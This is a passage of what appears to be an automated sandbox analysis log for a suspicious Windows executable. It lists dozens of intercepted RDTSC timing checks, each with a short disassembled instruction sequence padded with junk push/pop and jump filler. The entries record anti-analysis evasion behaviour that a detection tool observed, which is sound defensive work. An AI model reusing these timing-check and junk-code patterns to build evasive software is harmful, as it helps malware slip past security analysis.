                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CAD74 second address: 9CAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CB5A6 second address: 9CB5B3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CB5B3 second address: 9CB5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE5B8D9CB67h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D4B70 second address: 9D4B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D449C second address: 9D44A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D44A0 second address: 9D44A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D4788 second address: 9D4799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FE5B8D9CB5Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D4799 second address: 9D47A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DA91C second address: 9DA920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DAA95 second address: 9DAA9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DAED7 second address: 9DAEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB44D second address: 9DB46A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A753h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB46A second address: 9DB470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB470 second address: 9DB474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB474 second address: 9DB478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB478 second address: 9DB47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB47E second address: 9DB4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007FE5B8D9CB67h 0x00000015 jg 00007FE5B8D9CB56h 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 jmp 00007FE5B8D9CB5Eh 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB4CF second address: 9DB4DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE5B8F4A748h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C60 second address: 9E1C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8D9CB60h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C80 second address: 9E1C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C84 second address: 9E1C94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE5B8D9CB56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C94 second address: 9E1C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C9A second address: 9E1C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92ED6C second address: 92ED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E7DB5 second address: 9E7DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F5A8D second address: 9F5AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007FE5B8F4A74Eh 0x0000000c pushad 0x0000000d je 00007FE5B8F4A746h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54A7 second address: 9F54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54AF second address: 9F54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54B3 second address: 9F54C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FE5B8D9CB5Ch 0x00000010 jo 00007FE5B8D9CB56h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54C9 second address: 9F54D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54D1 second address: 9F54D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54D5 second address: 9F54D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54D9 second address: 9F54F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE5B8D9CB65h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFDEA second address: 9FFDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFDEE second address: 9FFE09 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB61h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFE09 second address: 9FFE3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a je 00007FE5B8F4A79Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8F4A753h 0x00000017 jg 00007FE5B8F4A746h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFE3F second address: 9FFE74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB61h 0x00000012 jmp 00007FE5B8D9CB5Fh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A021E8 second address: A021F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jg 00007FE5B8F4A746h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09D98 second address: A09D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09D9C second address: A09DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09DA2 second address: A09DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FE5B8D9CB56h 0x0000000d jne 00007FE5B8D9CB56h 0x00000013 pushad 0x00000014 popad 0x00000015 je 00007FE5B8D9CB56h 0x0000001b popad 0x0000001c jng 00007FE5B8D9CB5Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09BD8 second address: A09C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE5B8F4A752h 0x0000000a jo 00007FE5B8F4A746h 0x00000010 jnp 00007FE5B8F4A746h 0x00000016 jmp 00007FE5B8F4A752h 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D16C second address: A0D170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D170 second address: A0D18E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FE5B8F4A74Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D18E second address: A0D1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB61h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D1A4 second address: A0D1A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A1176F second address: A1177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A1177A second address: A1177E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11A6A second address: A11A75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11D36 second address: A11D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11E85 second address: A11E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11E8B second address: A11E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11E91 second address: A11E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A12038 second address: A12044 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A12044 second address: A1204A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A1218F second address: A12196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A5A second address: A16A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A5F second address: A16A6D instructions: 0x00000000 rdtsc 0x00000002 js 00007FE5B8F4A748h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A6D second address: A16A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A71 second address: A16A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A165CF second address: A16622 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE5B8D9CB68h 0x00000008 pop ecx 0x00000009 jp 00007FE5B8D9CB58h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FE5B8D9CB62h 0x00000019 jmp 00007FE5B8D9CB69h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A214DA second address: A2151C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE5B8F4A755h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FE5B8F4A759h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE5B8F4A74Ah 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A2151C second address: A21520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A21520 second address: A21530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE5B8F4A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4DBE1 second address: A4DBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4DEB5 second address: A4DEC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FE5B8F4A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4E568 second address: A4E572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE5B8D9CB56h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4E6F7 second address: A4E6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4E6FB second address: A4E717 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE5B8D9CB60h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A54426 second address: A54430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A54430 second address: A54441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB5Ch 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A57D38 second address: A57D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A57D3C second address: A57D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A57D40 second address: A57D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FE5B8F4A752h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50F00A3 second address: 50F00A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50F00A9 second address: 50F00AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 512016C second address: 51201BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8D9CB5Fh 0x00000009 adc al, FFFFFFFEh 0x0000000c jmp 00007FE5B8D9CB69h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 jmp 00007FE5B8D9CB5Ch 0x0000001d mov ax, 79D1h 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov edi, 14D4043Ch 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B00B9 second address: 50B00BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B00BD second address: 50B00C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B00C3 second address: 50B0124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8F4A74Ch 0x00000009 or esi, 44650478h 0x0000000f jmp 00007FE5B8F4A74Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FE5B8F4A758h 0x0000001b jmp 00007FE5B8F4A755h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movsx ebx, ax 0x0000002b mov eax, 092D119Bh 0x00000030 popad 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0124 second address: 50B0174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov bx, D64Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FE5B8D9CB64h 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov esi, 75D5122Dh 0x0000001a mov si, A429h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007FE5B8D9CB64h 0x00000026 push dword ptr [ebp+04h] 0x00000029 pushad 0x0000002a mov si, 2B0Dh 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0174 second address: 50B0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0178 second address: 50B01B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+0Ch] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE5B8D9CB5Eh 0x00000011 and si, 6858h 0x00000016 jmp 00007FE5B8D9CB5Bh 0x0000001b popfd 0x0000001c mov ecx, 182A290Fh 0x00000021 popad 0x00000022 push dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 mov cx, 2B07h 0x0000002a push eax 0x0000002b push edx 0x0000002c mov bx, cx 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D0749 second address: 50D07AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, CFh 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ch, DCh 0x0000000f mov ax, di 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FE5B8F4A759h 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE5B8F4A74Eh 0x00000020 pop ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FE5B8F4A74Eh 0x00000028 xor al, FFFFFF88h 0x0000002b jmp 00007FE5B8F4A74Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ecx, 74C8AD15h 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D0696 second address: 50D069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D069C second address: 50D06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D06A0 second address: 50D06DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d mov eax, 035CEFD7h 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FE5B8D9CB5Ah 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE5B8D9CB67h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D03F1 second address: 50D0408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A753h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50D0408 second address: 50D040E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
